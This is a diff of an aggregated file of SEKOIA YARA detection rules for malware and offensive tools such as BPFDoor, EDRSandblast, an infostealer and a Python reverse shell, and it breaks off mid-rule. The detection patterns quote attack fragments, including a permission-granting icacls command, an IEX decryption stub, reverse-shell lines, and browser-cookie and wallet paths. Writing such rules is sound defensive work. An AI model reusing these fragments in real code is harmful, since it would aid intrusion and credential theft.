-		id = "505dcbee-ae37-47c1-a322-2c52d10e68d7"
-		date = "2024-09-11"
+		id = "9e8af456-6f84-4922-a262-20b8f5c8a1eb"
+		date = "2022-12-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_realblindingedr_strings.yar#L1-L24"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "cb6219e2b6577b8d4a18114d595e10d7"
-		hash = "d0a251709c24a8f4c26d456dea22d90f"
-		logic_hash = "7b6a54c935bb40bd1be1d25be452d7185fd6f9dacbd7cbcde7cb37dfea09775e"
-		score = 75
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/suspicious_users_dev.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "6084b319efb7b4137517c63dd2ed1023a4b25513b7ac50e95154bbac0fea0af7"
+		score = 65
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Unload Driver Error 1"
-		$ = "Failed to create pipe. Error %d"
-		$ = "icacls \"%s\" /grant Everyone:(F)"
-		$ = "Register MiniFilter Callback driver:"
-		$ = "The driver's certificate has been revoked,"
-		$ = "[Success] Killed %s(%s)."
-		$ = "ntoskrnl.exe base address not found."
+		$user1 = "\\Users\\raghus1\\" ascii
+		$user2 = "\\Users\\drill\\" ascii
+		$key = {58 69 b3 5f b3 87 74 f6 65 eb 96 e7 6f 4d 16 83 }
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 4 of them
+		uint16be( 0 ) == 0x4d5a and filesize < 6MB and 1 of ( $user* ) and $key
 }
-
-rule SEKOIA_Backdoor_Win_Mgbot_Main
+rule SEKOIA_Backdoor_Powershellempire_Gen : FILE
 {
 	meta:
-		description = "Detect MgBot main.dll file"
+		description = "Detects EmpirePowershell"
 		author = "Sekoia.io"
-		id = "528baa11-58d5-470a-bd6d-963d4ac75d97"
-		date = "2024-03-20"
+		id = "36050a5b-bdca-45cd-8e26-7129fdcbf1e8"
+		date = "2022-04-15"
 		modified = "2024-12-19"
-		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt-attacks-telecoms-africa-mgbot"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/backdoor_win_mgbot_main.yar#L4-L35"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "61b335c88ce8bc56396b597c7c6f27b1d431941682401f0b3950c80edf7d8403"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/backdoor_powershellempire_gen.yar#L1-L16"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "21f255bcfb6da2aa996ed61ff5fb29a9355de6169095f7c3141a1b7f3cea5c2d"
 		score = 75
-		quality = 80
-		tags = ""
+		quality = 76
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "706c9030c2fa5eb758fa2113df3a7e79257808b3e79e46869d1bf279ed488c36"
-		hash2 = "017187a1b6d58c69d90d81055db031f1a7569a3b95743679b21e44ea82cfb6c7"
+
+	strings:
+		$ = "%{$J=($J+$S[$_]+$K[$_%$K.COUNt])%256;" nocase wide ascii
+		$ = "($IV+$K))|IEX" nocase wide ascii
 
 	condition:
-		pe.imphash( ) == "8e1ee04a99c77bd54c6dc55214ffa2e3" or hash.md5 ( pe.rich_signature.clear_data ) == "67e8e8b75b981b5c8ff31149dc2c61b2" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "7c6adf9987e6dfbf19b5f156b0314798" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "46fa9f5a035c8ae8de1a0d14150bd5ef" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "f7895f9456f8d51125e6744960c38133" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "5d82bb8a7ef37c417615381b446f715c" ) or for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "d7808c6662f098e685040f7c61bc033d9e73002f674de7cf2ffcd6230d60d429" )
+		all of them and filesize < 1MB
 }
-rule SEKOIA_Malware_Httpshell_Strings : FILE
+
+rule SEKOIA_Backdoor_Win_Minibus : FILE
 {
 	meta:
-		description = "Detects HTTPShell based on URL patterns"
+		description = "Detect the MINIBUS backdoor used by UNC1549 since August 2023"
 		author = "Sekoia.io"
-		id = "58f25666-5dc2-4f4f-9fac-fc05d1e66945"
-		date = "2024-01-08"
+		id = "f88bcf15-9a9f-4d84-adc6-db1db55fe93c"
+		date = "2024-02-29"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/malware_httpshell_strings.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "8f6f6ad459cc6edd80432528a507ca2cb84e6859be94f2e1caaea801bf809375"
+		reference = "https://www.mandiant.com/resources/blog/suspected-iranian-unc1549-targets-israel-middle-east"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/backdoor_win_minibus.yar#L4-L41"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "57dabcc15c84c4497b3561f19a7e464fb0dfe93576f4caea88c7cd8534cb4bfd"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -245710,28 +246241,27 @@ rule SEKOIA_Malware_Httpshell_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "/api/v1/Client/Info" wide ascii
-		$ = "/api/v1/Client/Download" wide ascii
-		$ = "/api/v1/Client/Upload" wide ascii
-		$ = "/api/v1/Client/Info" base64 base64wide
-		$ = "/api/v1/Client/Download" base64 base64wide
-		$ = "/api/v1/Client/Upload" base64 base64wide
+		$dll_150_1 = "TorvaldsPersist.dll"
+		$dll_150_2 = "FileCoAuth.exe"
+		$dll_50_1 = "TorvaldInitial.dll"
+		$dll_50_2 = "\\essential.dat"
 
 	condition:
-		3 of them and filesize < 5MB
+		( uint16( 0 ) == 0x5A4D and all of ( $dll_150_* ) or for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "2cf9797b1cfb5795d0fb892b7c371d506a5dd8b7c64fdc82975b3fde6d997df0" ) ) or ( uint16( 0 ) == 0x5A4D and all of ( $dll_50_* ) or for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "de3fb5d4419eb6b943872dd6e3dd93d19584ef2b158aa3158b3b09f0a9b628ef" ) )
 }
-rule SEKOIA_Apt_Reaper_Malicious_Lnk : FILE
+rule SEKOIA_Tool_Win_Driverjack : FILE
 {
 	meta:
 		description = "No description has been set in the source file - SEKOIA"
 		author = "Sekoia.io"
-		id = "8f055d1b-5727-4d77-9671-cdbb1ea69d5f"
-		date = "2023-09-12"
+		id = "08bc0fe8-38f1-4c73-99c8-2659b4a55815"
+		date = "2024-09-11"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_reaper_malicious_lnk.yar#L1-L15"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "8cec5819dd7b01b3993acae056f5640fa28ffe76b05d2d9e59779a73eb00bd6e"
+		reference = "https://github.com/klezVirus/DriverJack/blob/master/DriverJack"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_win_driverjack.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "649fc12915bdcdebbc3798a8ad0b9b32"
+		logic_hash = "0ea81c32b75ff66434f0c949be7d1478ce9268eb1b67dc5b7d6c7604cedcd72c"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -245739,105 +246269,84 @@ rule SEKOIA_Apt_Reaper_Malicious_Lnk : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "*rshell.exe" wide
-		$ = "/od') do call" wide
+		$ = "(*) Decrypting %llu bytes of file content using key '%s' of length %u..."
+		$ = "(*) Modifying file %s in mapped drive..."
+		$ = "(*) Checking file %s in mapped drive..."
+		$ = "(-) CreateProcess failed '%s' (%08x)."
+		$ = "(*) Mounted Drive Letter: %s"
 
 	condition:
-		uint32be( 0 ) == 0x4c000000 and all of them
+		uint16be( 0 ) == 0x4d5a and all of them
 }
-rule SEKOIA_Infostealer_Win_Xfiles : FILE
+rule SEKOIA_Dropper_Mac_Lazarus_Manuscrypt : FILE
 {
 	meta:
-		description = "Detect the X-FILES infostealer based on specific strings"
+		description = "MacOS Manuscrypt dropped by TraderTraitor"
 		author = "Sekoia.io"
-		id = "3ad3ee19-6be8-484b-943c-05813cdcbd18"
-		date = "2022-02-03"
+		id = "6138bd0c-1fcf-4586-b2b6-29955c7d6266"
+		date = "2022-04-19"
 		modified = "2024-12-19"
-		reference = "https://twitter.com/3xp0rtblog/status/1375206169384521730"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_xfiles.yar#L1-L50"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "404ee02fa1905f49c3c3ca525cfb3c5ba1d2ec46554239035c1891d21f547a2c"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/dropper_mac_lazarus_manuscrypt.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "dced1acbbe11db2b9e7ae44a617f3c12d6613a8188f6a1ece0451e4cd4205156"
+		hash = "9d9dda39af17a37d92b429b68f4a8fc0a76e93ff1bd03f06258c51b73eb40efa"
+		logic_hash = "dbe75a34f91906fc275c04af0fc068923993bab37a7574b3fe38733d87f31835"
 		score = 75
-		quality = 78
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$xfi0 = "Telegram bot - @XFILESShop_Bot" wide
-		$xfi1 = "Telegram support - @XFILES_Seller" wide
-		$brw0 = "\\Google\\Chrome\\User Data\\Default\\Network\\Cookies" wide
-		$brw1 = "\\Chromium\\User Data\\Default\\Cookies" wide
-		$brw2 = "\\Slimjet\\User Data\\Default\\Cookies" wide
-		$brw3 = "\\Vivaldi\\User Data\\Default\\Cookies" wide
-		$brw4 = "\\Opera Software\\Opera GX Stable\\Cookies" wide
-		$brw5 = "\\Opera Software\\Opera Stable\\Cookies" wide
-		$crp00 = "Tronlink" wide
-		$crp01 = "NiftyWallet" wide
-		$crp02 = "MetaMask" wide
-		$crp03 = "MathWallet" wide
-		$crp04 = "Coinbase" wide
-		$crp05 = "BinanceChain" wide
-		$crp06 = "GuardaWallet" wide
-		$crp07 = "EqualWallet" wide
-		$crp08 = "BitAppWallet" wide
-		$crp09 = "iWallet" wide
-		$crp10 = "Wombat" wide
-		$crp11 = "Zcash" wide
-		$crp12 = "Armory" wide
-		$crp13 = "Bytecoin" wide
-		$crp14 = "Jaxx" wide
-		$crp15 = "Exodus" wide
-		$crp16 = "Ethereum" wide
-		$crp17 = "AtomicWallet" wide
-		$crp18 = "Guarda" wide
-		$crp19 = "Coinomi" wide
-		$crp20 = "Litecoin" wide
-		$crp21 = "Dash" wide
-		$crp22 = "Bitcoin" wide
+		$ = "networksetup -getwebproxy '%s'" ascii
+		$ = "Cookie: _ga=%s%02d%d%d%02d%s" ascii
+		$ = "networksetup -listallnetworkservices" ascii
+		$ = "gid=%s%02d%d%03d%s" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of ( $xfi* ) or 5 of ( $brw* ) and 20 of ( $crp* )
+		uint32( 0 ) == 0xFEEDFACF and all of them
 }
-rule SEKOIA_Ransomware_Win_Masons_Jan2023 : FILE
+rule SEKOIA_Tool_Edrsandblast_Cli_Strings : FILE
 {
 	meta:
-		description = "Rule to detect Masons ransomware samples."
+		description = "Detects EDRSandblast CLI strings"
 		author = "Sekoia.io"
-		id = "cf2af08b-b4a8-4245-9308-242e15aeb346"
-		date = "2023-02-13"
+		id = "baf3c68a-1d28-464e-8240-28cc66c8c151"
+		date = "2024-01-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/ransomware_win_masons_jan2023.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "05badf0364c6f61cd081a3ae64bc92b48e6f59c026a5d6b5b68acd5a8987cf91"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_edrsandblast_cli_strings.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "dd6b3836b2f368c8d0ed06770f2469ef70d850ae1a9da26c7835f1877379efe9"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "7826978642c568f975e2b65d1575fdf92e634f7c80db2c86c9d7c8066e8955b8"
 
 	strings:
-		$s1 = "Masons" wide
-		$s2 = "@mineralIaha/@root_king1" wide
-		$s3 = "Glory @six62ix" wide
+		$ = "[!] LSASS dump might fail if RunAsPPL" wide
+		$ = "[!] You did not provide at least one option between" wide
+		$ = "[+] Detecting userland hooks in all loaded DLLs" wide
+		$ = "[+] Saving them to the CSV file" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them
+		uint16be( 0 ) == 0x4d5a and 4 of them
 }
-rule SEKOIA_Rule_Lazarus_Generic_Downloader_7C3F94702Fa7 : FILE
+rule SEKOIA_Tool_Tokenplayer_Strings : FILE
 {
 	meta:
-		description = "Detects a Generic Downloader used by Lazarus"
+		description = "Detects TokenPlayer based on strings"
 		author = "Sekoia.io"
-		id = "eb0f0a91-5e72-4358-91a3-7c3f94702fa7"
-		date = "2022-08-08"
+		id = "74ed8812-f113-47a9-9ff2-6cbe2746ee11"
+		date = "2024-11-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/rule_lazarus_generic_downloader_7c3f94702fa7.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "1ee58eb760fb74ef089f7d3eb423f314fe1c22e8c85b01eba0e965dea8c846ce"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_tokenplayer_strings.yar#L1-L25"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "f01eae4ee3cc03d621be7b0af7d60411"
+		logic_hash = "e419fa8c690816cd0e449f0a1d66d170e8806b38a99758631719b239363e330e"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -245845,33 +246354,30 @@ rule SEKOIA_Rule_Lazarus_Generic_Downloader_7C3F94702Fa7 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "%s%s%s%s = %s%s%s%s"
-		$ = "sec-ch-ua-mobile: ?0"
-		$ = "%s>%s"
-		$ = "d$f92&^$#FESAfaSDage#FDa"
-		$ = "Sec-Fetch-User: ?1"
+		$ = "[*]Spawning Process as user: %s\\%s" wide
+		$ = "[-]Target isn't vulnerable!"
+		$ = "[+]Process spawned!"
+		$ = "[+]Process Spawned"
+		$ = "[+]OpenProcessToken() success!"
+		$ = "CreateProcessWithLogonW() error : % u"
+		$ = "[+]CreateProcessWithLogonW() succeed!"
+		$ = "TokenPlayer.pdb"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 200KB and 3 of them
+		uint16be( 0 ) == 0x4d5a and 5 of them and filesize < 500KB
 }
-rule SEKOIA_Apt_Lazarus_Pondrat : FILE
+rule SEKOIA_Backdoor_Lin_Bpfdoor : FILE
 {
 	meta:
-		description = "Detects PondRAT via mangled command names"
+		description = "Detect the BPFDoor backdoor used by the Chinese TA Red Menshen"
 		author = "Sekoia.io"
-		id = "a957c158-a79a-4d7a-8473-b6960cf02d9b"
-		date = "2024-09-23"
+		id = "1776ff6f-6fbb-4a81-bcad-c43b5117c67c"
+		date = "2022-05-05"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_lazarus_pondrat.yar#L1-L24"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "b62c912de846e743effdf7e5654a7605"
-		hash = "61d7b2c7814971e5323ec67b3a3d7f45"
-		hash = "ce35c935dcc9d55b2c79945bac77dc8e"
-		hash = "f50c83a4147b86cdb20cc1fbae458865"
-		hash = "05957d98a75c04597649295dc846682d"
-		hash = "33c9a47debdb07824c6c51e13740bdfe"
-		logic_hash = "49c5f635e3873a145479bb164838043921d012eef7dc8ad6373c43c8cf1f14e0"
+		reference = "https://github.com/Neo23x0/signature-base/blob/master/yara/mal_lnx_implant_may22.yar"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/backdoor_lin_bpfdoor.yar#L1-L22"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "c917bd12731d761645adea72bc68c50927a0c2b0c31b2109f7065a992d338329"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -245879,58 +246385,60 @@ rule SEKOIA_Apt_Lazarus_Pondrat : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$cmd_PondRAT1 = "_Z7MsgDownP11_TRANS_INFO" ascii
-		$cmd_PondRAT2 = "_Z5MsgUpP11_TRANS_INFO" ascii
-		$cmd_PondRAT3 = "_Z6MsgRunP11_TRANS_INFO" ascii
-		$cmd_PondRAT4 = "_Z6MsgCmdP11_TRANS_INFO" ascii
+		$op1 = { e8 ?? ff ff ff 80 45 ee 01 0f b6 45 ee 3b 45 d4 7c 04 c6 45 ee 00 80 45 ff 01 80 7d ff 00 }
+		$op2 = { 55 48 89 e5 48 83 ec 30 89 7d ec 48 89 75 e0 89 55 dc 83 7d dc 00 75 0? }
+		$op3 = { e8 a? fe ff ff 0f b6 45 f6 48 03 45 e8 0f b6 10 0f b6 45 f7 48 03 45 e8 0f b6 00 8d 04 02 }
+		$op4 = { c6 80 01 01 00 00 00 48 8b 45 c8 0f b6 90 01 01 00 00 48 8b 45 c8 88 90 00 01 00 00 c6 45 ef 00 0f b6 45 ef 88 45 ee }
 
 	condition:
-		3 of them and filesize < 4MB
+		uint32( 0 ) == 0x464c457f and filesize > 10KB and filesize < 50KB and ( all of ( $op* ) )
 }
-rule SEKOIA_Ransomware_Win_Raworld
+rule SEKOIA_Apt_Gelsemium_Wolfsbane_Launcher : FILE
 {
 	meta:
-		description = "Detects files related to stage 1 of a campaign from the ransomware group RA World."
+		description = "Detects Gelsemium's WolfsBane launcher"
 		author = "Sekoia.io"
-		id = "a9ed9c5a-7a0e-4c2e-90f4-d52f5589b2b8"
-		date = "2024-07-24"
+		id = "26fbf4df-aa08-47b6-a73c-e8f80a408454"
+		date = "2024-11-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/ransomware_win_raworld.yar#L1-L23"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "583dd2ea8e20a87d0b67783d1dd59212eb133de1f945d5b4afad89e8a5017d35"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_gelsemium_wolfsbane_launcher.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "87e437cf74ce4b1330b8af9ff71edae2"
+		logic_hash = "9ecc3a8cb82f6183c263dde03a14f721d2e3aeb2338afc28e0368c323e5d51a9"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "Loder.exe" ascii fullword
-		$s2 = "Stage2.exe" wide
-		$s3 = "SYSVOL" wide
-		$s4 = "Finish.exe" wide
-		$s5 = "Exclude.exe" wide
-		$s6 = "Stage3.exe" wide
-		$s7 = "Pay.txt" ascii fullword
-		$s8 = "RA World" ascii fullword
-		$s9 = "Stage1.exe" ascii fullword
+		$ = "rm -f /dev/shm/sem*%s"
+		$ = "/etc/ld.so.preload"
+		$ = "kill -9 %d 2>/dev/null"
+		$ = "/,1d' %s 2>/dev/null"
 
 	condition:
-		4 of them
+		uint32be( 0 ) == 0x7F454C46 and filesize < 500KB and all of them
 }
-rule SEKOIA_Apt_Unk_Hrserv_Webshell_Strings : FILE
+rule SEKOIA_Unk_Quad7_Fsynet_Strings : FILE
 {
 	meta:
-		description = "Detects HrServ web shell based on strings"
+		description = "Matches node-r-control, asr_node, node-relay"
 		author = "Sekoia.io"
-		id = "684fd41c-9ea6-4f4e-8db4-82325a2ff80b"
-		date = "2023-11-23"
+		id = "897b2421-c177-48c0-8f5b-82d8434208cb"
+		date = "2024-08-20"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_unk_hrserv_webshell_strings.yar#L1-L23"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "b5650e08227bbdb82c635bd67abae57e3107be9126639619809bfbe2a7ffee89"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/unk_quad7_fsynet_strings.yar#L1-L33"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "f42849076e24b7827218f7a25bc11ccc"
+		hash = "b3b09819f820a4ecd31f82f369000af2"
+		hash = "92093dd7ba6ae8fe34a215c4c4bd1cd4"
+		hash = "e6f6a6de285d7c2361c32b1f29a6c3f6"
+		hash = "408152285671bbd0e6e63bd71d6abaaf"
+		hash = "5efc7d824851be9ec90a97d889a40d23"
+		logic_hash = "960119a025dedae7c5dfdf872cd515e2b6cf2999179ba84374d547047316caa2"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -245938,29 +246446,35 @@ rule SEKOIA_Apt_Unk_Hrserv_Webshell_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "open file error!"
-		$ = "create file error!"
-		$ = "[!] CreatePipe failed."
-		$ = "[!] CreateProcess failed."
-		$ = "[!] CreateProcess success,no result return."
-		$ = "; cadataIV="
-		$ = "cadataKey="
+		$ = "prev_hop_port"
+		$ = "next_hop_port"
+		$ = "back_hop_port"
+		$ = "next_tsn_port"
+		$ = "prev_hop_ip"
+		$ = "next_hop_ip"
+		$ = "back_hop_ip"
+		$ = "next_tsn_ip"
+		$ = "ikcp_"
+		$ = "/tmp/log_r"
+		$ = "total_hop"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 300KB and 5 of them
+		uint32be( 0 ) == 0x7f454c46 and filesize < 5MB and 6 of them
 }
-rule SEKOIA_Generic_Python_Reverse_Shell : FILE
+rule SEKOIA_Apt_Malware_Pocoproxy : FILE
 {
 	meta:
-		description = "Detects simple reverse shell written in Python"
+		description = "Detects strings in PocoProxy"
 		author = "Sekoia.io"
-		id = "ab25f8db-e39d-4aa4-b431-cf5cd2e038e5"
-		date = "2023-12-08"
+		id = "8b37e37f-339e-4f8b-b792-435096f56af0"
+		date = "2024-08-13"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/generic_python_reverse_shell.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "ced9923ef8018796545d93d9ac8ba3138dd7d4e79db742eb3babcd94c8d3c304"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_malware_pocoproxy.yar#L1-L25"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "2b89f15012512002c656ff821bbbeca0"
+		hash = "8d850fed6bb1f3b60365ed656c6791c5"
+		logic_hash = "217f4eabb5ff4534878b6dd192ae446e651d8510f03ceb501eb33e91199c15a8"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -245968,26 +246482,30 @@ rule SEKOIA_Generic_Python_Reverse_Shell : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "import pty"
-		$ = "lhost ="
-		$ = "os.dup2(s.fileno(),0)"
-		$ = "os.putenv(\"HISTFILE\",'/dev/null')"
+		$ = "-listen" ascii fullword
+		$ = "-connect" ascii fullword
+		$ = "-proxy" ascii fullword
+		$ = "%d-%d-%d %d:%d:%d" ascii fullword
+		$ = "%S://%S:%u%S" wide
+		$ = "\\r\\n[%u(%u/%u/%u/%u)]==> %S  %S>> %S:%d connect ok." wide
+		$ = "\\r\\nnconnect to %S:%d faild." wide
+		$ = "\\r\\nI'm listen %S:%d,welcome..." wide
 
 	condition:
-		filesize < 1KB and all of them
+		uint16be( 0 ) == 0x4d5a and 5 of them
 }
-rule SEKOIA_Backdoor_Lin_Bpfdoor : FILE
+rule SEKOIA_Apt_Apt28_Htmlsmuggling_Disclosing_Ip : FILE
 {
 	meta:
-		description = "Detect the BPFDoor backdoor used by the Chinese TA Red Menshen"
+		description = "Detects some kind of HTMLSmuggling used by APT28"
 		author = "Sekoia.io"
-		id = "1776ff6f-6fbb-4a81-bcad-c43b5117c67c"
-		date = "2022-05-05"
+		id = "57adc227-2b72-457e-a786-97ca1a7300d8"
+		date = "2023-09-11"
 		modified = "2024-12-19"
-		reference = "https://github.com/Neo23x0/signature-base/blob/master/yara/mal_lnx_implant_may22.yar"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/backdoor_lin_bpfdoor.yar#L1-L22"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "c917bd12731d761645adea72bc68c50927a0c2b0c31b2109f7065a992d338329"
+		reference = "https://www.zscaler.com/blogs/security-research/steal-it-campaign"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_apt28_htmlsmuggling_disclosing_ip.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "047d2d5f8d04576b6d57bc599f82406804845a3acb7628e7ad9b56e71e4dfe92"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -245995,26 +246513,25 @@ rule SEKOIA_Backdoor_Lin_Bpfdoor : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
